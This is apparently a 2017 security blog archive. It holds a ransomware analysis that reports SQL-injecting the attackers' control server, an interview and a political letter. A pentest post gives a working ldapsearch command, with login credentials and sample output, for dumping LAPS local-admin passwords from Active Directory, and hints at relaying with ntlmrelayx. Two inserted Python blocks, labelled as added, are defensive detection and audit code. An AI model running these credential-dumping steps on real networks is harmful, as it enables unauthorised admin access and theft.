Monthly Archives: July 2017

TOPransom: From eMail Attachment to Powning the Attacker’s Database

Hi folks, today I want to share a quick but intensive experience in fighting cybercrime. I hope you will appreciate the entire process, from getting an email attachment to pwning the ransom server in an attempt to stop the infection and to alert everybody about the threats found. As a second step I will try to identify the attacker in order to give additional information to law enforcement; those actions will not be published.

But, let's start by having a little bit of context:

During the past few days a colleague of mine (MarcoT.) gave me an interesting eMail attachment called: (sha256:fdd1da3bdd8f37dcc04353913b5b580dadda94ba).
Unzipping the attachment revealed a single .vbs file. By double-clicking a .vbs file the victim runs it through Microsoft wscript.exe, which fires up the infection process. The eMail belongs to a larger spamming campaign spread over the USA and, a few days ago, reaching Europe as well.

The Visual Basic script was obfuscated, as you may appreciate from the following image, but the obfuscation technique used was quite weak to reverse: only one round of packing was applied and, after a few substitutions, clear-text strings were observable.

Obfuscated Dropper

Interesting techniques were introduced in this dropper. First of all, a lot of junk code (apparently good code) was added in order to make the reverse engineering process much harder. The choice of such code, apparently taken from real droppers but not linked to the analyzed one, is particularly interesting. Another interesting technique concerned the "User-Agent" setting, which happened to be the key factor to download the real payload. The dropper per se is not interesting anymore. It basically uses a romantic WScript.Shell to execute an 'MZ' file once downloaded from compromised websites (IoC later on). The dropped file is returned directly in the HTTP response body and saved with a static name in the user's temporary folder: saToHxy.exe. The dropper renamed VB objects and VB functions to make everything a little harder.

Saving Dropper into user temporary file with static name

As of today the dropping URLs are the following ones:
As mentioned, a romantic Shell.Run executes the dropped payload. The payload (sha256:6a51d0cd9ea189babad031864217ddd3a7ddba84) looks like a one-stage payload: no heavy encryption nor multi-stage delivery is involved, and the user functions are clear and intuitive, with debugging headers enabled.
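The dropper chain above (a double-clicked .vbs run by wscript.exe, which then starts an executable with a static name from the user's temp folder) translates into a simple process-telemetry detection. The following is an added example, not code from the original post: the events are a constructed sample whose fields mirror Sysmon-style process-creation telemetry, and only the file name saToHxy.exe is taken from the post.

```python
"""Detection logic for the TOPransom dropper chain.

Added example, not code from the original post. SAMPLE_EVENTS is a
constructed sample (parent image, image, command line) in the shape of
process-creation telemetry; saToHxy.exe is the IoC from the post.
"""
import re
from pathlib import PureWindowsPath

# IoC from the post. The other Windows Script Host extensions are added here
# as a generalization; the post only describes a .vbs attachment.
DROPPED_NAME = "satohxy.exe"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_RE = re.compile(
    r'"([^"]+\.(?:vbs|vbe|js|jse|wsf))"|(\S+\.(?:vbs|vbe|js|jse|wsf))', re.I)
# User-writable folders where mail attachments and droppers typically land.
USER_WRITABLE = re.compile(
    r"^c:\\users\\[^\\]+\\(?:appdata\\local\\temp|downloads|desktop)\\", re.I)

SAMPLE_EVENTS = [  # constructed sample, not real telemetry
    # benign: domain logon script run by userinit, not by the shell
    {"id": 1, "parent": r"C:\Windows\System32\userinit.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\dc1\netlogon\logon.vbs"},
    # benign: the user opens a browser
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe"},
    # suspicious: .vbs extracted from a mail attachment and double-clicked
    {"id": 3, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" '
                r'"C:\Users\bob\AppData\Local\Temp\Rar$DIa0.123\invoice_4431.vbs"'},
    # malicious: the script host starts the dropped payload from %TEMP%
    {"id": 4, "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\bob\AppData\Local\Temp\saToHxy.exe",
     "cmdline": r"C:\Users\bob\AppData\Local\Temp\saToHxy.exe"},
]


def basename(path):
    """Lower-cased file name of a Windows path, for case-insensitive matching."""
    return PureWindowsPath(path).name.lower()


def analyze(events):
    """Return (event id, severity, reason) tuples for the two dropper steps."""
    alerts = []
    for ev in events:
        image, parent = basename(ev["image"]), basename(ev["parent"])
        # Step 1: the shell (a double-click) starts a script host on a script
        # that sits in a user-writable folder such as %TEMP% or Downloads.
        if image in SCRIPT_HOSTS and parent == "explorer.exe":
            m = SCRIPT_RE.search(ev["cmdline"])
            script = (m.group(1) or m.group(2)) if m else ""
            if script and USER_WRITABLE.match(script):
                alerts.append((ev["id"], "medium",
                               f"{image} ran {basename(script)} from a user-writable path"))
        # Step 2: the script host spawns an executable from a user-writable
        # folder; the static name from the post raises the severity.
        if parent in SCRIPT_HOSTS and USER_WRITABLE.match(ev["image"]):
            severity = "high" if image == DROPPED_NAME else "medium"
            alerts.append((ev["id"], severity,
                           f"{parent} launched {image} from a user-writable path"))
    return alerts


if __name__ == "__main__":
    for event_id, severity, reason in analyze(SAMPLE_EVENTS):
        print(f"event {event_id}: [{severity}] {reason}")
```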

No Packing found

Firing up IDA and reversing the sample revealed a small XOR-encoded payload and some anti-debugging tricks, such as timing control and performance monitoring, as follows:

Anti-Debugging tricks: Timing and Performance control
Following on with the analysis, it becomes clear that the Structured Exception Handler (SEH) chain technique is used extensively. By triggering exceptions the attacker calls modified exception handler functions able to decode the payload and allocate it directly onto newly allocated memory pages, ending up in a "call eax" section. The following image shows the decoding loop.

Decoding Loop on 0x3001220
Following is a piece of decoded memory area (configuration file), decoded by the loop at 0x03001220.

Decoded Memory Area
Dynamic analysis produced evidence of a ransomware payload. In fact, following the decoded payload further into memory, the analyst could observe the ransom HTML page (next image). I would rather show a rendered "ransom request page" than a junk of hexadecimal bytes (sha256: cdb3fef976270ab235db623d6a4a97ea93c41dd1). The ransom page looks like the following image.

Ransom Request Rendered File
I will call this ransomware the "TOPransom" because of the funny and evident mistake the attacker made in writing the ransom request file, where he suggested downloading the TOP Browser rather than the TOR Browser :D (LOL). TOPransom encrypts files and changes the file extensions to an alphanumeric extension, usually made of 3 characters (why "usually"? Because looking at the attacker's DB it looks like that, but I didn't find evidence of it). The modified extension is used as a hidden parameter in the ransom page. The following image shows some hidden fields used by the attacker to bring information to the control server.

POST request to buy the decrypter
Particularly interesting (at least from my personal point of view) is the hidden input called "FB", which looks like it piggybacks two pieces of information to the command and control (ransom) server: the extension and some hexadecimal content included in a crafted tag called "pre". By clicking on "Yes I want to buy" the victim POSTs this data and is prompted with the following page, asking for 0.18 BTC in order to get the files back.

Request for ransom
The FB hidden value "made me curious". By changing the first value (the one before the "pre" statement) you get different BTC wallets with different asking prices. The following image shows the different results.

Request for ransom 2

This makes the system vulnerable to "balance enumeration" and to "denial of resources". In fact, by enumerating the attacker's wallet space I perform a twofold action: if the wallet exists I read its balance; if the wallet does not exist the backend creates a new wallet, filling up the space the attacker reserved for wallet creation. This action could block new wallet creation, ergo new infections. So let's write a quick and dirty Python script to force new wallet creation and map the money.

Forcing new wallets to limit further infections (please do not consider this script production ready, nor the best implementation for such a goal)

Following on with the analysis, by playing a little bit further with that parameter (FB) I figured out it was vulnerable to SQL injection. What a nice surprise!! The vulnerable part was the crafted tag called "pre", which was vulnerable to code injection, triggering SQL injection on the backend.

SQLi on C&C server !

So let's try to pwn the attacker! At first sight you may observe a MySQL error with non-Latin characters. Google Translate says it is Russian! Now we know that the attacker belongs, with high probability, to the Russian community. By investigating the DB a little harder (only reachable over TOR and super slow) I found the bot IDs and their related tasks. Please have a look at the incremental IDs and try to imagine how big that network was.

Bot Ids and relative locations

Another interesting topic was to investigate who the system users (a.k.a. the attackers) were; in other words, the users of such a "ransomware-as-a-service" platform, who happened to be the real attackers. Since it looks like a "Ransomware as a Service" platform, figuring out how many dollars the attackers were able to gain over time is my next goal. The following obfuscated image shows some of the usernames, passwords (ciphertext) and wallets the attackers used to gain profit.

Attackers Username, Passwords and Wallets
My attention ended up on that guy:
That guy is related to the following private wallet: 1P3t56jg5RQSkFDWkDK3xBj9JPtXhSwc3N

As you might guess there are two main wallet types:
- Public wallets, which store the victims' money. They are the publicly available wallets; everybody who got infected must know them in order to pay the ransom.
- Private wallets, which are the "real ones" belonging to the attackers. Private wallets receive money from the public wallets once the attack reaches its end. Platform charges are applied during that transaction.

Having the private wallet means having the possibility to track down the transaction history. Transaction history is a great source to figure out if that guy carried out more illegal activity over the past months. Following is the 's private wallet. We may observe interesting transactions, as shown in the following image.

Transaction From   1P3t56jg5RQSkFDWkDK3xBj9JPtXhSwc3N

That wallet, which is DB-related to , made a huge amount of transactions back on 2017-04-23 and 2017-04-20, moving out of the wallet 81,87 BTC harvested through many small and similar transactions! If we include the BTC harvested from this attack, whose wallet currently has a balance of 13 BTC, he or she is close to 100 BTC in transactions. How about 2017-04 (do you remember any famous attack at that time? :P)? With high probability the attacker has engaged in illegal activities (such as ransomware activities) more than once; this boy/girl is, with a high probability, a recurring attacker. By investigating a little bit more on that email address it's easy to find heavy relations between and , which is a Russian-based marketplace where attackers buy and sell attacking tools, information and experiences.

After a few more crafted SQL queries I was able to extract the "inst" table. The field names are the following ones:


Yes, come on! This table records the infected clients; let's see if we can do something to help them!
A simple DB count showed me more than 2k infections so far. Not bad for a brand new ransomware as a service. The targets look very spread all over the world. So far it's possible to extract the following country distribution.

TOPransom Victims Distribution

I will not disclose IP addresses in order to guarantee the victims' privacy. Another interesting datum comes from the victim browser distribution (another parameter collected by the attacker). Curiously, the most used browser on Windows devices is Chrome, as the following image shows. (Remember: the infection vector wasn't the web browser but wscript.exe, which opens a .vbs when it is double-clicked.)

TOPransomware victims browser distribution

In this post I've described the activity that took me from an email attachment to dumping the entire attacker's database on a Ransomware as a Service platform that I called TOPransom. I've been trying to enumerate the attacker's income and to mitigate the spreading vector by filling up wallet creation per user with a quick and dirty Python script.

Following are the IoCs for your detection systems. Have fun!

IoC (summing up):
  • dropper .vba (sha256:fdd1da3bdd8f37dcc04353913b5b580dadda94ba)
  • saToHxy.exe (sha256:6a51d0cd9ea189babad031864217ddd3a7ddba84)
  • RECOVER-FILES-html (sha256: cdb3fef976270ab235db623d6a4a97ea93c41dd1)
  • Bot location:
  • Bot Location:
  • TOP Browser

Dump LAPS passwords with ldapsearch

If you’ve ever been pentesting an organization that had LAPS, you know that it is the best solution on the planet for randomizing local administrator passwords. (You should just be leaving them disabled.)

LAPS stores its information in Active Directory:

  • The expiration time: ms-Mcs-AdmPwdExpirationTime: 131461867015760024

  • And the actual password in clear text: ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(

When LAPS first came out, any user in Active Directory could read it. Microsoft fixed that; you now need the "All extended rights" permission on the object, or Full Control of it.

In many organizations there are pockets of OU admins, or even standard users, who are in charge of a specific set of users and (in particular) computers over which they have full control.

There is already a Metasploit module thanks to Meatballs: But, unfortunately, I don’t always have access to a Meterpreter session to run the module.

ldapsearch (which is included in the package ldapscripts on Debian/Ubuntu) can be used to make the same query that the module does. Here is an example run:

ldapsearch -x -h -D \
"helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" \
"(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

Let's break this down:

  • -x - Use basic authentication
  • -h - Connect to the Domain Controller for ldap
  • -D "helpdesk" -w ASDqwe123 - Login as the helpdesk user, with the password ASDqwe123
  • -b "dc=sittingduck,dc=info" - This loads the base LDAP object of the entire domain.
  • "(ms-MCS-AdmPwd=*)" - Filter out any objects that I can’t see a value for ms-MCS-AdmPwd for. (If you have rights as that user to see even one Administrator password, this will show it.)
  • ms-MCS-AdmPwd - Only show me the ms-MCS-AdmPwd object (which by default includes the object name and DN so you will still know what host it belongs to)

What does that look like?

$ ldapsearch -x -h -D "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
# LDAPv3
# base <dc=sittingduck,dc=info> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd

# DC1, Domain Controllers,
dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 2F1i/++N0H+G]{Y&,F

# SDCLIENT_DAWIN7, LabComputers, Lab,
dn: CN=SDCLIENT_DAWIN7,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 8CDR4,2UE8BA{zw2@RR

# SD_WSUS_2012, LabComputers, Lab,
dn: CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: +3!UY5@g9B.64RV2z/T

# WIN-PM0ID6F0AHN, LabComputers, Lab,
dn: CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(

# search reference
ref: ldap://,DC=sittingduck,DC=info

# search reference
ref: ldap://,DC=sittingduck,D

# search reference
ref: ldap://,DC=sittingduck,D

# search reference
ref: ldap://,DC=sittingduck,DC=info

# search result
search: 2
result: 0 Success

Now, just having the local admin password doesn’t ensure that the account is enabled, but there is a good bet that you are good to go now.
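The same LDIF output is also what a defender can use to audit what a delegated account has been granted. Below is an added example, not code from the original post, that parses ldapsearch output in the format shown above and reports, per computer object, whether ms-Mcs-AdmPwd was readable and whether it has expired, without printing the passwords. The LDIF inside it is a constructed sample (the DC1 values and the expiration time are the ones shown on this page; the ForestDnsZones referral host is assumed).

```python
"""Audit which LAPS passwords an account can read, without echoing them.

Added example, not code from the original post: it parses the LDIF that
ldapsearch prints and reports, per computer object, whether ms-Mcs-AdmPwd
came back and when it expires. SAMPLE_LDIF is a constructed sample.
"""
import base64
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# ldapsearch base64-encodes ("attr:: ...") values that are not safe to print,
# e.g. a password starting with a space; splitting on ":" alone misses those.
B64_PWD = base64.b64encode(b" starts-with-a-space").decode()
SAMPLE_LDIF = """\
# DC1, Domain Controllers,
dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 2F1i/++N0H+G]{Y&,F
ms-Mcs-AdmPwdExpirationTime: 131461867015760024

# WIN-PM0ID6F0AHN, LabComputers, Lab,
dn: CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd:: __B64__
ms-Mcs-AdmPwdExpirationTime: 0

ref: ldap://ForestDnsZones.sittingduck.info/DC=ForestDnsZones,DC=sittingduck,DC=info

result: 0 Success
""".replace("__B64__", B64_PWD)


def parse_ldif(text):
    """Yield one dict per LDIF record with attribute names lower-cased (LDAP
    names are case-insensitive: the query says ms-MCS-AdmPwd, the server
    answers ms-Mcs-AdmPwd). Folded lines and base64 values are handled."""
    lines = []
    for raw in text.splitlines():           # a leading space continues the
        if raw.startswith(" ") and lines:   # previous line (LDIF folding)
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    record = {}
    for line in lines + [""]:
        if not line.strip():                # blank line ends a record
            if record:
                yield record
            record = {}
        elif not line.startswith("#"):
            name, _, rest = line.partition(":")
            if rest.startswith(":"):        # "attr:: base64"
                value = base64.b64decode(rest[1:].strip()).decode("utf-8")
            else:
                value = rest.strip()
            record.setdefault(name.lower(), []).append(value)


def filetime_to_datetime(value):
    """ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME: 100 ns ticks since
    1601-01-01 UTC. Zero or missing means no expiration has been set."""
    ticks = int(value)
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10) if ticks > 0 else None


def audit_laps(text, now=None):
    """Per computer object: is the password readable, and has it expired?"""
    now = now or datetime.now(timezone.utc)
    report = []
    for rec in parse_ldif(text):
        if "dn" not in rec:                 # search references, result trailer
            continue
        pwd = rec.get("ms-mcs-admpwd", [])
        expires = filetime_to_datetime(rec.get("ms-mcs-admpwdexpirationtime", ["0"])[0])
        report.append({"dn": rec["dn"][0], "readable": bool(pwd),
                       "length": len(pwd[0]) if pwd else 0, "expires": expires,
                       "expired": expires is not None and expires < now})
    return report
```

The expiration value from this page, 131461867015760024, decodes to 2 August 2017 (UTC), i.e. about a month after the post, which is what a default 30-day LAPS rotation looks like.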

P.S. You can also authenticate using Kerberos (think Golden/Silver tickets)

P.P.S Because Windows doesn’t (to the best of my knowledge) require signing on Domain Controllers for LDAP connections yet (probably does in 2016 or will soon), with a little bit of coding you can get ntlmrelayx to dump LAPS passwords ;-)

A Letter to President Donald Trump regarding Global and Cyber Security

Dear President Trump,

Hello. As President of Paramount Defenses, I pen this letter most respectfully to you, the President of our Great United States.

First off, I should mention that I write neither as a Republican, nor as a Democrat, but as a fellow patriotic American citizen and a cyber security specialist, because I care, and that my desire to do so publicly is inspired by how much you Sir share publicly, and that this most respectful letter is in light of your tweet about discussing the creation of a Cyber Security Unit with Russia.

I'll do my best to keep this VERY simple.

Top-5 Global Security Risks

As President of the United States, you're likely aware of the Top-5 risks to not just America, but to the entire world today -

1. The Risk of the Use of a WMD / Nuclear War
2. The Risk of Earth's Demise, posed by Climate Change
3. The Risk of Terrorism, posed by Terror Groups Worldwide
4. The Risk of the Decline of American Leadership in the World
5. The Risk of Swift and Colossal Damage, posed by Cyber Threats

I am by no means an expert on global security, but common sense suggests that risks 1 and 2 above would be catastrophic to all of mankind, risk 3 could pose a serious threat to life and property, and that risk 4 could increase the likelihood of risks 1, 2 & 3.

As for risk 5, I do happen to know one vital area of cyber security decently well, so I'll share just a few thoughts about it, but first, I did want to take a moment to talk about risk 4 because it potentially impacts the lives of 7,000,000,000+ people worldwide.

The Importance of American Leadership

Mr. Trump, as President of the United States, you are the most powerful and influential person in the world, and most people would take such GREAT responsibility VERY seriously, since their actions and decisions could save or destroy the world.

Sir, the elections are over. You won. You are the President of the United States, and it is time to let the talking be, and start working to make America great again. This isn't reality TV, this is real life, and it's a billion times more significant and serious.

If I were the President of the United States, and I deeply cared about making America great again, I likely wouldn't have a moment to watch TV, Tweet or Golf. I'd be working harder than the hardest American to make America greater and safer.

(If I may momentarily digress: speaking of making America great again, while there may certainly be much to be done to restore its greatness, we owe it to our future generations to do so without polluting or endangering our precious environment.)

Today more than ever, we live in a precarious, highly-connected and inter-dependent world, and the world needs strong, mature and steady American leadership to amicably address so many important and complicated issues, such as those listed above.

Speaking of which, I'd like to share a few thoughts on risk 5, the risk of swift and colossal damage posed by Cyber Threats, but before I do so, again, I'd request you to please take a few moments to comprehend the profound importance, seriousness and significance of both the position bestowed upon you by the American people, as well as the challenges that you, Sir, today have the unique privilege and responsibility of addressing for both America and the world that America is inextricably a part of.

[ Hopefully you see that the reality is that since America is inextricably a part of the world, what happens out in the world could impact us substantially, so to make America great(er and safer) again, we must maintain American leadership in the world. ]

The Cyber Risk

Mr. President, to put it most simply, Cyber Security is the Achilles' Heel of developed nations today, because over the last few decades, our reliance on computer systems and networks has increased substantially (exponentially), and sadly within them exist many systemic and component specific deficiencies (vulnerabilities) which can be exploited to inflict colossal harm.

(This risk is actually addressable, and what the world needs is a White Knight so we have a trustworthy foundation to operate on, but until we get there, i.e. until the world has such a defensive shield in place to rely on, we all have reality to deal with.)

Consequently, today from our governments to our energy grids, from our defense systems to our transportation systems, and from our banks to our industries (i.e. a nation's business organizations), literally everything is exposed to varying levels of risk.

It is thus hardly surprising that today cyber security is one of the most important challenges the world faces, an assertion best evidenced by the fact that Russia's purported cyber interference in the 2016 American elections remains a contentious issue.

Speaking of which, while the U.S and in fact all countries and, ideally all business organizations, should certainly bolster their cyber defenses, establishing a Cyber Security Unit with the Russians might NOT be such a good idea, as also voiced by 1, 23.

By the way, those who truly understand cyber security know that there is no such thing as an "impenetrable cyber security unit".

A quick digression. Yes, indeed the Russians are very good at cyber security and likely at hacking, and they're persistent, but they're not the only ones out there trying to hack our agencies and companies, and they don't always succeed. But, I digress.

Mr. President, you may likely already have some of the world's best inputs and advice when it comes to cyber security, so I'd just like to share paramount cyber security insight with you - Trillion-Dollar Cyber Security Insight for President Donald Trump.

Mr. President, as I put my pen down, I'll only add that of the risks listed above, in the near-term, the Cyber Risk may be 2nd only to the Nuclear Risk, because its realistic probability of occurrence is substantially higher, and its potential for damage, colossal.

Mr. Trump, you have a historic opportunity to SERVE the American People, and define your legacy - it's yours to embrace or squander.


Security Affairs Questions

Soon after I blogged about the “Snagging Creds from Locked Machines” and it went a bit viral for a day, Pierluigi Paganini from asked me some great questions, that I failed to answer in a timely manner. They are probably a lot less useful to him now (8 months late), but I thought I would answer them anyways.

You are one of the most respected experts on cyber security. Could you tell me what your technical background is and when you started hacking?

I think my earliest “hacking” was cheating at video games. I enjoyed learning the mechanics of how the Game Genie and GameShark worked, and how I could cheat at games much more than playing them. My parents always thought that I ruined the games, but it really was the figuring out how to get the right hex for infinite life or ammo that was the game for me.

After that I owe my traditional IT / Security learning to the Marine Corps 0651 and 0656 schools, the amazingly patient Marines and civilians at the MARCERT, the OSCP and Chris Gates’ blog.

What was your greatest hacking challenge?

My “greatest hacking challenge” I would say is myself. Self awareness is an ever progressing goal, I attempt to figure out and make myself better every day. I fail at it a lot, but all the best hacks are pure and simple perseverance and I plan to never let this one have the better of me.

What are the 4 tools that cannot be missed in the hacker’s arsenal and why?

So much troll ammo in that question. Or I could go the philosophical route and talk about the mind, and never giving up, but I’ll take the question at face value:

  1. A programming language. Yes, you don’t have to know programming to be in “Information Security” but to be a “hacker” (in the sense of breaking into systems), knowing a language will save you when the tool that you need for a very specific use case just doesn’t exist. It also helps you when you run into a tool that is broken, that everyone seems to use, but for some reason you are the only one noticing it’s broken.
  2. An Intel NUC (or other computer) with ESXi (or other virtualization) on it. Having a lab, even on a hand-me-down laptop/computer with Virtualbox and trial copies of Windows, I was able to learn more by building whatever application I was trying to break into, than I ever would have by poking at it from the Internet.
  3. A blog. I forget things all the time and I usually use my blog or another note taking method (pen and paper, text editor, telling friends about it), to be able to reference it later when I need it. Even if you are the only reader of your own blog it is hands down one of the best methods of learning for me because it forces me to re-do things and revisit my assumptions.
  4. Metasploit. Mostly because it makes things dead simple, and learning to use it isn’t very hard.

Which are the most interesting hacking communities on the web today?

I’ve never really been welcome or even interested in the darker side of hacking communities. I would get caught if I even tried to dive into that world.

To know one’s limitations is to know one’s self

However, I run NoVAHackers with Chris Gates so I would be remiss to not mention it, and its parent AHA. Both are great communities with basically a mini-conference every month at the meetings.

If you don’t have a hacker space, or “Hackers Association” in your area, first, look harder there probably is one that you just haven’t found yet, and second, if not, start it. I went to the first 2 or 3 meetings of NoVA Hackers by myself. Don’t be deterred by single digit membership or attendance. NoVA Hackers is near ~700 members + another 500 or so alumni since it started in 2009.

Which is the industry (healthcare, automotive, telecommunication, banking, and so on) most exposed to cyber attacks and why?

Honestly I don’t want to answer this. Why would you point at someone and say “hit him, he’s easier to take down”?

What scares you more in the Internet?

The fact that people think it’s a weapon for or against them.

We often hear about cyber weapons and cyber attacks against critical infrastructure. Do you believe the risk of a major and lethal cyber attack against critical infrastructure is concrete?

Yes, but in what country? Is the U.S. even the most connected these days? I doubt it. In counter point I would like you to watch the following for actual statistics on the matter by @SpaceRogue:

Why and which are the most exposed CI?

Same issue with the industry question, not going to point at the weakest link. I guess there is an argument that making light of these targets helps to force action, but I think unless you have had your head in the sand everyone knows of “Cyber Threats” these days, and a heading like:

Security Expert Rob Fuller says that Widgets are the most vulnerable target in U.S. Infrastructure

doesn’t really further any message or get anyone’s attention to something they don’t already know.

Thanks for your time. Have an awesome 4th of July.